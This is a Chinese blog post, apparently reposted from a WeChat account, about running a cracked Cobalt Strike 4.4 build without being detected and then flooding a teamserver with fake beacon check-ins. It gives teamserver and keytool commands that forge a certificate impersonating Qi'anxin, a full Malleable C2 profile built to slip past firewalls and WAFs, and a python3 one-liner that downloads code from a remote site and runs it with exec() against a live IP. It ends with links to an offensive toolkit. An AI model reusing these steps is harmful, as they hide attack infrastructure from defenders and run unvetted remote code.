Cobalt_Strike_4.4 去除流量特征+批量上线

  • A+
所属分类:安全工具

不久之前,本公众号分享了CS4.4源码,国外黑客经过对源码加工编译,目前已经成功编译成CS4.4可用版本 ,修复命令行日志问题,去除屏幕截图、键盘记录自动退出暗桩后基本可以 无障碍使用,今天来总结一下CS4.4去除流量特征+批量上线操作。


Cobalt_Strike_4.4 去除流量特征+批量上线



默认情况下,没有做流量混淆的CS会被防火墙拦截流量,所以经常会看到CS上线了机器但是进行任何操作都没有反应。CS流量混淆一般有两种方法,一种更改teamserver 里面与CS流量相关的内容,一种是利用Keytool工具生成新的store证书。


修改分为三个步骤:


1. 修改默认端口,这里我们修改成123452. 去除store证书特征,特征修改成QAXNB3. 修改profile,修改默认配置


0x01 修改默认端口


编辑teamserver文件,更改server port部分 12345

# start the team server.java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=12345 -Dcobaltstrike.server_bindto=0.0.0.0 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=QAXNB -server -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -classpath ./cobaltstrike.jar server.TeamServer $*


0x02 去除store证书特征


查看证书,默认密码123456


keytool -list -v -keystore cobaltstrike.store


可以看到默认证书有很明显的cs特征的,比如 Alias name Owner Issuer 字段


Cobalt_Strike_4.4 去除流量特征+批量上线


Keytool是一个Java的证书管理工具,Keytool可以生成一个store证书。


[[email protected]-8-12-centos Cobalt Strike 4.4 (August 04, 2021)]# keytool -h非法选项:  -h密钥和证书管理工具
命令:
-certreq 生成证书请求 -changealias 更改条目的别名 -delete 删除条目 -exportcert 导出证书 -genkeypair 生成密钥对 -genseckey 生成密钥 -gencert 根据证书请求生成证书 -importcert 导入证书或证书链 -importpass 导入口令 -importkeystore 从其他密钥库导入一个或所有条目 -keypasswd 更改条目的密钥口令 -list 列出密钥库中的条目 -printcert 打印证书内容 -printcertreq 打印证书请求的内容 -printcrl 打印 CRL 文件的内容 -storepasswd 更改密钥库的存储口令
使用 "keytool -command_name -help" 获取 command_name 的用法


使用以下命令生成一个新的store证书,-alias 和 -dname 可以自由发挥,也可以用其他的来混淆流量。


keytool -keystore ./cobaltstrike.store -storepass QAXNB -keypass QAXNB -genkey -keyalg RSA -alias cobaltstrike -dname "CN=www.qianxin.com, OU=北京奇安信科技有限公司, O=运维部, L=北京, S=北京, C=CN"

参数 含义
-alias 指定别名-storepass 指定更改密钥库的存储口令-keypass pass 指定更改条目的密钥口令-keyalg 指定算法-dname 指定所有者信息


查询新证书


Cobalt_Strike_4.4 去除流量特征+批量上线



当然也可以编辑 teamserver 文件来生成证书


# generate a certificate  # naturally you're welcome to replace this step with your own permanent certificate.  # just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and  # -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up  # an SSL server socket. Also, the SHA-1 digest of the first certificate in the store  # is printed so users may have a chance to verify they're not being owned.if [ -e ./cobaltstrike.store ]; then  print_info "Will use existing X509 certificate and keystore (for SSL)"else  print_info "Generating X509 certificate and keystore (for SSL)"  keytool -keystore ./cobaltstrike.store -storepass QAXNB   -keypass QAXNB -genkey -keyalg RSA -alias cobaltstrike   -dname "CN=www.qianxin.com, OU=北京奇安信科技有限公司, O=运维部, L=北京, S=北京, C=CN"fi


0x03 Malleable-C2-Profiles


很多WAF都能检测出CS的流量特征,然而,CS的流量由Malleable C2配置来掌控的,所以我们需要定向去配置这个Malleable-C2的havex.profile文件。


Beacon与teamserver端c2的通信逻辑


1.stager的beacon会先下载完整的payload执行。2.beacon进入睡眠状态,结束睡眠状态后用http-get方式发送一个metadata(具体发送细节可以在malleable_profie文件里的http-get模块进行自定义),metadata内容是将目标系统的版本,当前用户等信息给teamserver端。3.如果存在待执行的任务,则teamserver上的c2会响应这个metadata发布命令。beacon将会收到具体会话内容与一个任务id。4.执行完毕后beacon将回显数据与任务id用post方式发送回teamserver端的C2(细节可以在malleable_profile文件中的http-post部分进行自定义),然后又会回到睡眠状态。


首先需要先下载havex.profile文件


git clone https://github.com/rsmudge/Malleable-C2-Profiles.git


Cobalt_Strike_4.4 去除流量特征+批量上线


CS中集成了一个包含在Linux平台下的C2lint工具,可以检查havex.profile代码是否有问题


chmod 777 ./c2lint./c2lint ./Malleable-C2-Profiles/APT/havex.profile


修改havex.profile配置


因为0.0.0.0是Cobalt Strike DNS Beacon特征,可以在havex.profile内加一段 set dns_idle "8.8.8.8"; 之后profile内默认的能改则改。


set sample_name "奇安信";
set dns_idle "8.8.8.8";
set sleeptime "30000";
set useragent "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08";
set pipename "mypipe-f##";set pipename_stager "mypipe-h##";

https-certificate { set keystore "cobaltstrike.store"; set password "QAXNB";}
# Clone some header values (Sample from: https://malshare.com/sample.php?action=detail&hash=c6e161a948f4474849d5740b2f27964a)# ./peclone c6e161a948f4474849d5740b2f27964astage { set checksum "0"; set entry_point "134733"; set image_size_x86 "348160"; set image_size_x64 "348160"; set name "Tmprovider.dll"; set rich_header "x63x02x25x0fx27x63x4bx5cx27x63x4bx5cx27x63x4bx5cx9ax2cxddx5cx24x63x4bx5cx2ex1bxdex5cx3bx63x4bx5cx2ex1bxcfx5cx1bx63x4bx5cx2ex1bxc8x5cx8fx63x4bx5cx00xa5x30x5cx28x63x4bx5cx27x63x4ax5cx97x63x4bx5cx2ex1bxc1x5cx60x63x4bx5cx2ex1bxd9x5cx26x63x4bx5cx39x31xdfx5cx26x63x4bx5cx2ex1bxdax5cx26x63x4bx5cx52x69x63x68x27x63x4bx5cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00";
# disable this little obfuscation set stomppe "false";
# make these things havex-ish transform-x86 { strrep "ReflectiveLoader" "RunDllEntry"; strrep "beacon.dll" ""; }
transform-x64 { strrep "ReflectiveLoader" "RunDllEntry"; strrep "beacon.x64.dll" ""; } # strings gathered from Yara rules and sandbox string dumps stringw "%s <%s> (Type=%i, Access=%i, ID='%s')"; stringw "%02i was terminated by ThreadManager(2)n"; stringw "main sort initialise ...n"; stringw "qsort [0x%x, 0x%x] done %d this %dn"; stringw "{0x%08x, 0x%08x}"; stringw "Programm was started at %02i:%02i:%02in"; stringw "a+"; stringw "%02i:%02i:%02i.%04i:"; stringw "**************************************************************************n"; stringw "Start finging of LAN hosts...n"; stringw "Finding was fault. Unexpective errorn"; stringw "Hosts was't found.n"; stringw "ttttt%O2i) [%s]n"; stringw "Start finging of OPC Servers..."; stringw "Was found %i OPC Servers."; stringw "tt%i) [%s\%s]ntttCLSID: %sn"; stringw "tttUserType: %sntttVerIndProgID: %sn"; stringw "OPC Servers not found. Programm finished"; stringw "Start finging of OPC Tags..."; stringw "[-]Threads number > Hosts number"; stringw "[-]Can not get local ip"; stringw "[!]Start"; stringw "[+]Get WSADATA"; stringw "[+]Local:"; stringw "[-]Connection error"; stringw "Was found %i hosts in LAN:"; stringw "%s[%s]!!!EXEPTION %i!!!"; stringw "final combined CRC = 0x%08x";}
http-get { set uri "/include/template/isx.php /wp06/wp-includes/po.php /wp08/wp-includes/dtcla.php";
client { header "Referer" "http://www.google.com"; header "Accept" "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"; header "Accept-Language" "en-us,en;q=0.5";
# base64 encoded Cookie is not a havex indicator, but a place to stuff our data metadata { base64; header "Cookie"; } }
server { header "Server" "Apache/2.2.26 (Unix)"; header "X-Powered-By" "PHP/5.3.28"; header "Cache-Control" "no-cache"; header "Content-Type" "text/html"; header "Keep-Alive" "timeout=3, max=100";
output { base64; prepend "<html><head><mega http-equiv='CACHE-CONTROL' content='NO-CACHE'></head><body>Sorry, no data corresponding your request.<!--havex"; append "havex--></body></html>"; print; } }}
# define indicators for an HTTP POSThttp-post { set uri "/modules/mod_search.php /blog/wp-includes/pomo/src.php /includes/phpmailer/class.pop3.php";
client { header "Content-Type" "application/octet-stream";
# transmit our sess id as /whatever.php?id=[identifier] id { parameter "id"; }
# post our output with no real changes output { print; } }
# The server's response to our HTTP POST server { header "Server" "Apache/2.2.26 (Unix)"; header "X-Powered-By" "PHP/5.3.28"; header "Cache-Control" "no-cache"; header "Content-Type" "text/html"; header "Keep-Alive" "timeout=3, max=100";
# this will just print an empty string, meh... output { prepend "blah blah blah"; mask; base64; prepend "<html><head><mega http-equiv='CACHE-CONTROL' content='NO-CACHE'></head><body>Sorry, no data corresponding your request.<!--havex"; append "havex--></body></html>"; print; } }}


----------------------------------------------------------------------------


去除流量特征后 ,我们来进行CS4.4批量上线


伪造CobaltStrike的上线信息,原理是在CobaltStrike teamserver的默认配置下可以识别出beacon信息,基于该信息就可以伪造CobaltStrike的上线信息了


一般来说,没有做特别防护的teamserver,使用了stager功能都会受到这个工具的影响。stager功能即分段shellcode,换句话说,使用了cs的shellcode都会受此影响。


Cobalt Strike 上线器


Cobalt Strike Spam CS上线器在线版 - Hacking8安全信息流


仅支持CS设置了HTTP/HTTPS监听器的情况,仅需要输入teamserver的地址或者通过内存分析出cs beacon信息,即可一键上线。


如遇到 No module named 'urllib3',请先执行 pip3 install urllib3,再执行本程序


运行CS4.4设置监听端口88


Cobalt_Strike_4.4 去除流量特征+批量上线



Cobalt_Strike_4.4 去除流量特征+批量上线


Cobalt_Strike_4.4 去除流量特征+批量上线



在命令终端执行以下代码即可(需要python3环境)
python3 -c "exec(__import__('urllib.request',fromlist='Hacking8 CobaltSpam').urlopen('https://i.hacking8.com/cobaltspam?py=1').read().decode())" -u https://88.158.18.38:88 -r 10


Cobalt_Strike_4.4 去除流量特征+批量上线


Cobalt_Strike_4.4 去除流量特征+批量上线


wireshark抓包查看数据包特征


Cobalt_Strike_4.4 去除流量特征+批量上线


TCP数据包且全部乱码


Cobalt_Strike_4.4 去除流量特征+批量上线



Cobalt_Strike_4.4 去除流量特征+批量上线



通过截图可以看到我们之前修改的配置去除流量特征是有效的。


很多小伙伴想要我开头图片里面的武器库


下载地址:新建标签页 (github.com)


https://github.com/ghealer/GUI_Tools


Cobalt_Strike_4.4 去除流量特征+批量上线



一个由各种图形化渗透工具组成的工具集,环境已配置完成,自带Java1.8与Java9。


下载程序源代码


git clone https://github.com/ghealer/GUI_Tools.git

pip install -r requirements.txt



下载工具包


https://pan.baidu.com/s/1y5hfQY_PkrbJA5EYuw2W4w     hgi8


将工具包解压(密码:GUI_Tools)放在GUI_Tools根目录下


PS.工具包里的Cobalt Strike内置了很多插件,如有需要可以自行加载。


目录结构


├── GUI_Tools.py├── GUI_Tools_wxpython_gui.py├── JAR_Management.fbp├── gui_other├── gui_scan├── gui_shouji├── gui_webshell├── Java_path└── setting.py


Cobalt_Strike_4.4 去除流量特征+批量上线


执行程序


python3 GUI_Tools.py


参考文章:


CobaltStrike去除流量特征 - CoLoo - 博客园 (cnblogs.com)


Cobalt Strike Spam CS上线器在线版 - Hacking8安全信息流


GitHub - ghealer/GUI_Tools: 一个由各种图形化渗透工具组成的工具集

本文始发于微信公众号(利刃信安):Cobalt_Strike_4.4 去除流量特征+批量上线

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: